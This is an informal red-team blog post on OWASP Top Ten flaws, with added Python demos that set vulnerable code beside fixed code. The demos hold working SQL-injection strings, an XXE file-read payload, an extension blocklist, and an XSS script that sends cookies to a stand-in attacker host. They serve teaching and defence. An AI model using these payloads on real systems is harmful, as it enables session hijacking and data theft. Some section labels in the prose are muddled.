Rapunzel Stars in: Red Riding Hood

Donald Bachmann
Aug 7, 2018 · 8 min read

Red Team Attack Vector Blog

Red Team Report

With the ever-evolving threat market, Rapunzel thought it might be beneficial to team up with a cyber Red Riding Hood approach to security. So follow Rapunzel while she cracks open a can of whoop-derrière for the bug bounty player’s club, with a shout-out to the big timers who might be savvy in areas other than web application pen-testing vectors. With Rapunzel’s state-of-the-art application security software bundle, created in part (actually in whole) by the Savage Beasts over at Offensive Security, the creators of Kali Linux, anyone should be able to switch gears into beast mode. Before we unleash the beast, go ahead and put your red hood on and follow along as Rapunzel smashes through on her forest trail of the OWASP Top Ten.

Let the Countdown (count up, actually) Begin!

The first on our list of beat-down dogmas was brought to us by none other than one of Rapunzel’s finest, an ex-Marine who’ll be quick to turn his head if you say Jeff. Jeff originally wanted to make an extra buck burning WhiteHat midnight oil this summer. Hold on for a second, did you say midnight oil?? Yup, I sure did, but the buck didn’t stop there! Tell ’em what they’ve got coming in at OWASP’s first-round draft pick, number ONE:

SQL Injection [which] refers to an injection attack wherein an attacker can execute malicious SQL statements that control a web application’s database server. Since an SQL Injection vulnerability could possibly affect any website or web application that makes use of an SQL-based database, the vulnerability is one of the oldest, most prevalent and most dangerous of web application vulnerabilities.
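Added example (not code from the post or from the Rapunzel team): the injectable login query beside its parameterized fix, run against a constructed in-memory SQLite table. The table, rows and payloads are made up for the demo, and passwords are kept in clear text here only to keep the focus on the query.

```python
import sqlite3


def make_db():
    """Constructed sample user store (not from the post): two accounts."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT, role TEXT)")
    db.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [("alice", "correct horse", "admin"), ("bob", "hunter2", "user")],
    )
    return db


def login_vulnerable(db, username, password):
    """The injectable pattern: user input is pasted into the SQL text, so the
    input can change the statement's grammar instead of just its data."""
    sql = (
        "SELECT username, role FROM users WHERE username = '%s' AND password = '%s'"
        % (username, password)
    )
    return db.execute(sql).fetchone()


def login_parameterized(db, username, password):
    """The fix: placeholders bind the input as values; a quote in the input
    stays a quote inside a string and never becomes SQL syntax."""
    sql = "SELECT username, role FROM users WHERE username = ? AND password = ?"
    return db.execute(sql, (username, password)).fetchone()


# Constructed payloads: a tautology that makes the WHERE clause always true
# (AND binds tighter than OR), and a comment that drops the password check.
TAUTOLOGY = "' OR '1'='1"
COMMENT_OUT = "alice'--"


if __name__ == "__main__":
    db = make_db()
    print(login_vulnerable(db, "alice", TAUTOLOGY))       # ('alice', 'admin'), no password needed
    print(login_vulnerable(db, COMMENT_OUT, "whatever"))  # ('alice', 'admin') again
    print(login_parameterized(db, "alice", TAUTOLOGY))    # None
```

The vulnerable version is what the Acunetix definition above is describing: the attacker's string becomes part of the statement, so `' OR '1'='1` returns the first row in the table (the admin) without any password at all. The parameterized version sends the same string as data and gets no row back.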

Coming in at our number TWO spot is Broken Authentication:

Brought to you by none other than yours truly, the big D-man Donnie Bachmann, the one who put the satin in your swag! Let me put it like this: surfing the web might be a carefree activity for the majority of internet users. After all, how many people really get hacked, or carelessly leave tabs open from a prior bank account session at the library? Users who approach their web security mildly, browsing away with their fingers crossed, might not be making the best subconscious choice for themselves. Broken authentication is behind many a data breach the victim never saw coming. Attacks in this class can get around even a solid login form, because the login is only as strong as the credential-management functions around it: password change, forgot-my-password, remember-me, account update and related functions are where the flaws usually sit, along with the session handling that follows a login (a session ID that survives logout, or that an attacker can guess or reuse).

Trailing behind is our buddy with OWASP’s number Three spot, Sensitive Data Exposure:

With a knife and a fresh-baked bread of your choice, Manny, the youngest member of the Rapunzel team, can slap together a sandwich so good it’ll make you wanna slap your BlackHat Momma for not hacking into Subway’s recipe mainframe system.

Although Manny isn’t too crazy about some of the self-sacrificing endeavors encountered by us Elite Ethical Haxors, he still set aside some time to break down the get down on Sensitive Data Exposure. Many web applications and APIs do not properly protect sensitive data, such as financial, healthcare, and PII. Attackers may steal or modify such weakly protected data to conduct credit card fraud, identity theft, or other crimes. Sensitive data may be compromised without extra protection, such as encryption at rest or in transit, and requires special precautions when exchanged with the browser. Nice copy and paste job (that’s the OWASP Top 10 2017 wording, word for word)!
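Added example (not code from the post or the Rapunzel team) covering the "at rest" half of Sensitive Data Exposure and the credential-management side of Broken Authentication from the previous section: password storage. The exposed form (unsalted MD5) sits beside the protected form (salted PBKDF2-HMAC-SHA256 with a constant-time compare). The iteration count, salt size and record format are assumptions for this example, not anything the post specifies.

```python
import hashlib
import hmac
import os

# Assumed parameters (not from the post). Tune ITERATIONS up to whatever your
# login latency budget tolerates; the stored record carries the value used.
ALGO = "pbkdf2_sha256"
ITERATIONS = 200_000
SALT_BYTES = 16


def hash_password(password, salt=None):
    """Return the string to store: algorithm$iterations$salt_hex$digest_hex.
    A fresh random salt per user means two identical passwords store differently."""
    salt = salt if salt is not None else os.urandom(SALT_BYTES)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, ITERATIONS)
    return "%s$%d$%s$%s" % (ALGO, ITERATIONS, salt.hex(), digest.hex())


def verify_password(password, stored):
    """Recompute with the stored salt and iteration count, then compare in
    constant time so the comparison itself leaks nothing about the digest."""
    try:
        algo, iters, salt_hex, digest_hex = stored.split("$")
    except ValueError:
        return False
    if algo != ALGO:
        return False
    candidate = hashlib.pbkdf2_hmac(
        "sha256", password.encode("utf-8"), bytes.fromhex(salt_hex), int(iters)
    )
    return hmac.compare_digest(candidate, bytes.fromhex(digest_hex))


def weak_hash(password):
    """The exposed form: unsalted, fast MD5. Equal passwords share one hash,
    so a single precomputed table cracks every reuse in the whole dump."""
    return hashlib.md5(password.encode("utf-8")).hexdigest()


if __name__ == "__main__":
    record = hash_password("hunter2")
    print(record)
    print(verify_password("hunter2", record), verify_password("hunter3", record))
    print(weak_hash("hunter2") == weak_hash("hunter2"))  # True: no salt, same hash for everyone
```

Storing passwords this way does nothing for data in transit; that is what TLS on every page is for, and the "How does it work?" section further down is about that half of the problem.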

As we come around the corner with our next contender at OWASP’s number Four, give it up for none other than XML External Entities (XXE):

Rapunzel’s wouldn’t be complete without our “Mr. Robot”-loving counterpart Dilara Marasli, a student who first came to the U_S_of_A.py for a STEM competition. Soon after, she didn’t hesitate to join the winning team here in the states with a cyber, nail-you-to-the-firewall kind of approach to pwning the cyber threat market. Tell us a little about number four, Miss Robot!

Well Donnie, Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into websites. XSS attacks occur when a user least expects it, preferably when an attacker uses a web application to send malicious code, generally in the form of a browser-side script, to a different end user. On the brighter side of death by XML External Entity vulnerability (abbreviated XXE), we have ourselves an attack against an application parsing XML input from an unreliable source. It’s usually caused by a misconfigured XML parser, so double-check your code before a dude with a BlackHat crosses your web app’s path!
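Added example (not code from the post or the Rapunzel team) of the "misconfigured XML parser" Dilara mentions: Python's standard-library SAX/expat reader with the external-general-entities feature switched on (the misconfiguration) and off (the fix). The document, the entity name and the temp file standing in for a sensitive server-side file are all constructed for the demo. Python's bundled parser has defaulted this feature to off since 3.7.1; setting it explicitly is what lets both outcomes be seen.

```python
import io
import os
import tempfile
import xml.sax
from xml.sax.handler import feature_external_ges


class TextCollector(xml.sax.ContentHandler):
    """Collects character data, i.e. what the application ends up processing."""

    def __init__(self):
        super().__init__()
        self.chunks = []

    def characters(self, data):
        self.chunks.append(data)


def parse_untrusted_xml(xml_bytes, allow_external_entities):
    """Parse with the stdlib SAX/expat reader.

    allow_external_entities=True is the misconfigured parser: a SYSTEM entity
    is fetched from disk (or the network) and spliced into the document.
    False is the hardened setting: the reference expands to nothing.
    """
    handler = TextCollector()
    parser = xml.sax.make_parser()
    parser.setContentHandler(handler)
    parser.setFeature(feature_external_ges, allow_external_entities)
    parser.parse(io.BytesIO(xml_bytes))
    return "".join(handler.chunks).strip()


def write_secret_file():
    """Constructed stand-in for a sensitive file on the server (a config, say)."""
    fd, path = tempfile.mkstemp(prefix="xxe-demo-", suffix=".txt")
    with os.fdopen(fd, "w") as fh:
        fh.write("db_password=correct-horse-battery-staple\n")
    return path


def xxe_payload(path):
    """Attacker-controlled document: an external entity aimed at a local file,
    referenced inside ordinary element content."""
    doc = (
        '<?xml version="1.0"?>\n'
        '<!DOCTYPE order [ <!ENTITY xxe SYSTEM "{path}"> ]>\n'
        "<order><item>&xxe;</item></order>"
    )
    return doc.format(path=path).encode("utf-8")


if __name__ == "__main__":
    secret = write_secret_file()
    try:
        print("vulnerable:", parse_untrusted_xml(xxe_payload(secret), True))
        print("hardened:  ", repr(parse_untrusted_xml(xxe_payload(secret), False)))
    finally:
        os.remove(secret)
```

With the feature on, the file's contents come back as the text of `<item>`, which is exactly what an application would then echo, store or forward. With it off, the same document parses cleanly and `<item>` is empty; for a parser that cannot be configured this way, rejecting any input that carries a DOCTYPE is the usual alternative.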

I know you probably need to grab your motor-oil-like cup of Joe and make your way over to that smart car that might get hacked, which we’ll save for our future efforts. Furthermore, I would like to invite you to take a gander at some of our documents on the OWASP Top Ten, which include walk-through adventures with RAPUNZEL, no “punzel” intended! This ain’t no fairytale, Hollywood, shake’n bake idea we are cook’n up, so stay tuned as Rapunzel proceeds to explain some or all of the remaining vulnerabilities.

Broken Access Control

What is it?:

  • Broken access control is common because it is hard to detect with automated scanners and because applications rarely get effective functional testing of their authorization rules.
  • Basically, most sites have admin accounts and regular accounts. Admin should be able to reach the admin functions and every regular account; a regular account should only reach its own data. Broken access control is when that rule isn’t enforced on the server: a regular user changes an id in the URL, or requests an admin page directly, and gets it.
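Added example (not code from the post or the Rapunzel team) of the admin/regular rule above, as a pair of request handlers: one that only checks that somebody is logged in, and one that checks the object's owner and the caller's role. The accounts, orders and `Forbidden` type are constructed for the demo.

```python
class Forbidden(Exception):
    """Raised when the caller is not allowed to perform the action."""


# Constructed sample data (not from the post): accounts with a role, and the
# orders each account owns.
USERS = {
    "alice": {"role": "admin"},
    "bob": {"role": "user"},
    "carol": {"role": "user"},
}
ORDERS = {
    101: {"owner": "bob", "total": 42.00},
    102: {"owner": "carol", "total": 99.00},
}


def require_login(user):
    if user not in USERS:
        raise Forbidden("login required")


def get_order_vulnerable(user, order_id):
    """Checks that *someone* is logged in, then returns any order by id.
    bob fetches carol's order 102 just by changing the number in the URL."""
    require_login(user)
    return ORDERS[order_id]


def get_order_fixed(user, order_id):
    """Object-level check: the owner or an admin, everyone else is denied."""
    require_login(user)
    order = ORDERS[order_id]
    if order["owner"] != user and USERS[user]["role"] != "admin":
        raise Forbidden("not your order")
    return order


def list_all_orders_fixed(user):
    """Function-level check: an admin page must verify the role on the server,
    not just hide the menu link from regular users."""
    require_login(user)
    if USERS[user]["role"] != "admin":
        raise Forbidden("admin only")
    return dict(ORDERS)


def is_denied(fn, *args):
    """True when the call is refused with Forbidden (used by the demo)."""
    try:
        fn(*args)
    except Forbidden:
        return True
    return False


if __name__ == "__main__":
    print(get_order_vulnerable("bob", 102))          # carol's order, handed to bob
    print(is_denied(get_order_fixed, "bob", 102))     # True
    print(get_order_fixed("alice", 102))              # admin sees it
    print(is_denied(list_all_orders_fixed, "bob"))    # True
```

The point is where the check lives: the fixed handlers make the decision on the server for every request, using the caller's identity from the session, never from anything the client sends.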

Security Misconfiguration

What is it?:

  • Improper server or web application configuration leading to various flaws.
  • Unpatched bugs.
  • Default admin accounts left enabled with their default credentials.
  • Unprotected files and directories (directory listing on, backups and config files sitting under the web root).
  • Anything that leads to private data.
  • Many web servers run Apache httpd, which ships with a great many modules and features.
  • Over its lifetime Apache httpd has accumulated more than 200 published vulnerabilities, many of them in optional modules.
  • If a web server does not need a feature, turn it off or remove it; every enabled feature is extra attack surface.
  • The extra features could be default accounts, unused pages, or unprotected file uploads.
  • One important misconfiguration is file uploads, as mentioned above.
  • Files the server would execute (.php, .exe, .asp, .js, etc.) are normally rejected. If that check is implemented incorrectly (a case-sensitive blocklist, a missed extension like .phtml, a double extension such as shell.php.jpg that Apache’s AddHandler still runs as PHP) or isn’t present at all, an attacker uploads a web shell and executes code on the server.
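Added example (not code from the post or the Rapunzel team) of the upload check done wrong and done right: the blocklist the text lists beside an allowlist that normalises the name first. The extension sets and the sample filenames are constructed for the demo.

```python
import os
import posixpath

# The deny-list from the text: it only rejects the names it knows about.
BLOCKED_EXTENSIONS = {".php", ".exe", ".asp", ".js"}

# Assumed allow-list for an image/document upload form (not from the post).
ALLOWED_EXTENSIONS = {".jpg", ".jpeg", ".png", ".gif", ".pdf"}


def upload_allowed_blocklist(filename):
    """Deny-list check as commonly written: exact, case-sensitive, last
    extension only. Bypassed by .PHP, .phtml and shell.php.jpg."""
    ext = os.path.splitext(filename)[1]
    return ext not in BLOCKED_EXTENSIONS


def upload_allowed_allowlist(filename):
    """Allow-list check on a normalised basename: one extension, lower-cased,
    client-supplied directories stripped, dotfiles and NUL bytes refused."""
    name = posixpath.basename(filename.replace("\\", "/"))
    if not name or name.startswith(".") or "\x00" in name:
        return False
    parts = name.lower().split(".")
    if len(parts) != 2:          # "shell.php.jpg" and "noext" both fail here
        return False
    return "." + parts[1] in ALLOWED_EXTENSIONS


if __name__ == "__main__":
    # Constructed attacker filenames against both checks.
    for candidate in ["shell.PHP", "shell.phtml", "shell.php.jpg", ".htaccess",
                      "../../photo.jpg", "photo.JPG"]:
        print("%-18s blocklist=%-5s allowlist=%s" % (
            candidate, upload_allowed_blocklist(candidate), upload_allowed_allowlist(candidate)))
```

Even the allowlist is only one layer: store uploads outside the web root under a server-generated name, serve them with a fixed Content-Type, and make sure the upload directory has no execute handler configured.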

Cross-Site Scripting (XSS)

What is it?:

Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user.

What could a determined hacker do when exploiting an XSS vulnerability?

XSS allows arbitrary execution of JavaScript in the victim’s browser, in the context of your site, so the damage that can be done by an attacker depends on the sensitivity of the data being handled by your site. Some of the things hackers have done by exploiting XSS:

  • Spreading worms on social media sites. Facebook, Twitter and YouTube have all been successfully attacked in this way.
  • Session hijacking. If the session cookie is readable from script (no HttpOnly flag), malicious JavaScript can send the session ID to a remote site under the hacker’s control, allowing the hacker to impersonate that user by taking over the session in progress.
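Added example (not code from the post or the Rapunzel team): a comment template that reflects user text unescaped, the same template with output encoding, and a link template showing why encoding alone is not enough in an attribute. The cookie-stealing payload, the attacker hostname `attacker.example` and the templates are constructed for the demo.

```python
import html
from urllib.parse import urlparse


def render_comment_vulnerable(comment):
    """Reflects the user's text straight into the HTML."""
    return '<p class="comment">%s</p>' % comment


def render_comment_fixed(comment):
    """HTML-encodes for element content, so a '<' can never open a tag."""
    return '<p class="comment">%s</p>' % html.escape(comment, quote=True)


def render_link_fixed(url, label):
    """Attribute context needs more than encoding: html.escape leaves
    'javascript:alert(1)' intact, so the scheme is allow-listed first."""
    scheme = urlparse(url.strip()).scheme.lower()
    if scheme not in ("http", "https"):
        url = "#"
    return '<a href="%s">%s</a>' % (
        html.escape(url, quote=True), html.escape(label, quote=True))


# Constructed payload of the session-hijacking kind described above: it loads
# an "image" from the attacker's host with the victim's cookies in the URL.
COOKIE_THIEF = (
    '<script>new Image().src="https://attacker.example/c?"+document.cookie</script>'
)


def opens_script_tag(markup):
    """True if the rendered markup would start a script element."""
    return "<script" in markup.lower()


if __name__ == "__main__":
    print(render_comment_vulnerable(COOKIE_THIEF))
    print(render_comment_fixed(COOKIE_THIEF))
    print(render_link_fixed("javascript:alert(document.cookie)", "profile"))
    print(render_link_fixed("https://example.com/a?b=1&c=2", "profile"))
```

Encoding has to match the context the data lands in (element text, attribute value, URL, script); a template engine that auto-escapes covers the first two, and HttpOnly on the session cookie keeps `document.cookie` out of the payload's reach even when a hole is missed.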

Sensitive Data Exposure

How does it work?:

  • When the client sends clear-text data to the web server, an attacker on the path between them reads or alters it without either side (client or web server) knowing.

How secure is it?:

  • Over the last few years this has been one of the top vulnerabilities that attackers have been taking advantage of. The security all depends on whether the sensitive data is encrypted: in transit (TLS on every page, not just the login form) and at rest (strong hashing for passwords, encryption for the rest), with the keys kept out of reach of the application that holds the data.

Who does it impact?:

  • Everyone using the internet. That may be very broad, but to put it into specifics: the people who use websites to send or retrieve personal documents or data.

Insufficient Logging and Monitoring

Source: https://securityonline.info/owasp-top-10-2017/

What is Insufficient Logging and Monitoring?

Strictly speaking this isn’t a flaw in the code itself; it’s the absence of the practice that lets you spot an attack in progress. Logging and monitoring is the proactive measure that makes an attack identifiable and stoppable. For example, your website has a username and password, and someone is trying to get in by running the 10,000 most common usernames against the 10,000 most common passwords for each of them. A failure in logging and monitoring gives the attacker all the time he needs to get it right and cause damage to your website. A working logging and monitoring practice strips the attacker of stealth, locks the attempts out, and may drive the attacker away or catch him. The actions that can be taken are beyond the scope of this write-up. There is a certain balance in logging information. Too little and you may not be able to tell whether it is an attack or merely suspicious activity. Too much will also make it hard to identify an attack or suspicious activity, or to work out what type of attack they are trying to perform.

How is it preventable?

  1. Failed logins (and other security events) should not be stored only on the machine that produced them. If attackers get into the host that holds the login logs, they can edit the logs to prevent detection. Ship the logs to a separate, append-only log host; giving forensics the time and the intact evidence to respond to an attack is vital.
  2. When an attack is identified, a planned response may not be available or in place. This puts network admins in a purely defensive position: even though the attack has been identified, the attacker may still cause damage if a response process is not in place.
  3. Have your website and network professionally penetration tested and receive a detailed report on the strengths and weaknesses in your network. Then fix them. Keep your software updated to patch known exploits.
  4. Create a good schedule for monitoring the log files, and be thorough enough to find suspicious activity. Complacency on the part of the security team is what makes this type of attack succeed, and logging without monitoring is useless.
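Added example (not code from the post or the Rapunzel team) of the monitoring half of the above, run over the central copy of the auth log rather than the web server's own: a sliding-window detector that alerts on a source address with too many failed logins, and reports how many distinct usernames it tried, which separates the credential-stuffing run described earlier (many accounts, one guess each) from a brute force on a single account. The log line format, the thresholds and the sample lines are all constructed for the demo.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed, syslog-like line format (not from the post), e.g.
#   2018-08-07T10:00:01 login FAIL user=admin src=203.0.113.5
LINE_RE = re.compile(
    r"^(?P<ts>\S+) login (?P<result>OK|FAIL) user=(?P<user>\S+) src=(?P<src>\S+)$"
)


def parse_line(line):
    """Return a dict for a well-formed line, None for anything else."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ev = m.groupdict()
    ev["ts"] = datetime.fromisoformat(ev["ts"])
    return ev


def detect_bruteforce(lines, threshold=10, window=timedelta(seconds=60)):
    """Alert once per source IP that reaches `threshold` failed logins inside
    a sliding `window`. distinct_users close to failures is the credential
    stuffing signature; one user with many failures is a password brute force."""
    recent = defaultdict(deque)  # src -> deque of (timestamp, username) inside the window
    alerts = {}
    for line in lines:
        ev = parse_line(line)
        if ev is None or ev["result"] != "FAIL":
            continue
        hist = recent[ev["src"]]
        hist.append((ev["ts"], ev["user"]))
        while hist and ev["ts"] - hist[0][0] > window:
            hist.popleft()
        if len(hist) >= threshold and ev["src"] not in alerts:
            alerts[ev["src"]] = {
                "first_seen": hist[0][0],
                "last_seen": ev["ts"],
                "failures": len(hist),
                "distinct_users": len({u for _, u in hist}),
            }
    return alerts


def build_sample_log():
    """Constructed sample: one user fat-fingering twice, then a credential
    stuffing run of 25 usernames from a single source in 25 seconds."""
    base = datetime(2018, 8, 7, 10, 0, 0)

    def stamp(seconds):
        return (base + timedelta(seconds=seconds)).isoformat()

    lines = ["%s login FAIL user=manny src=198.51.100.7" % stamp(i) for i in range(2)]
    lines.append("%s login OK user=manny src=198.51.100.7" % stamp(3))
    lines += ["%s login FAIL user=user%02d src=203.0.113.5" % (stamp(10 + i), i)
              for i in range(25)]
    return lines


if __name__ == "__main__":
    for src, info in detect_bruteforce(build_sample_log()).items():
        print(src, info)
```

The threshold and window are the "balance" the text talks about: set them too tight and the fat-fingering user trips the alert, too loose and a slow attacker spreading 10,000 attempts across a day never does. Distributed attacks that rotate source addresses need a second key (failures per username, or per password hash) on top of the per-source one shown here.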

I hope you enjoyed all these tidbits about how we, the red team, would infiltrate your not-so-secure network. It might seem like we barely put together this blog strategy; that’s because we barely did. Please bear with us as we develop and grow with the industry that so preciously needs more people like us. Thank you, and stay tuned till next week.

Thanks to Nicholas Handy.
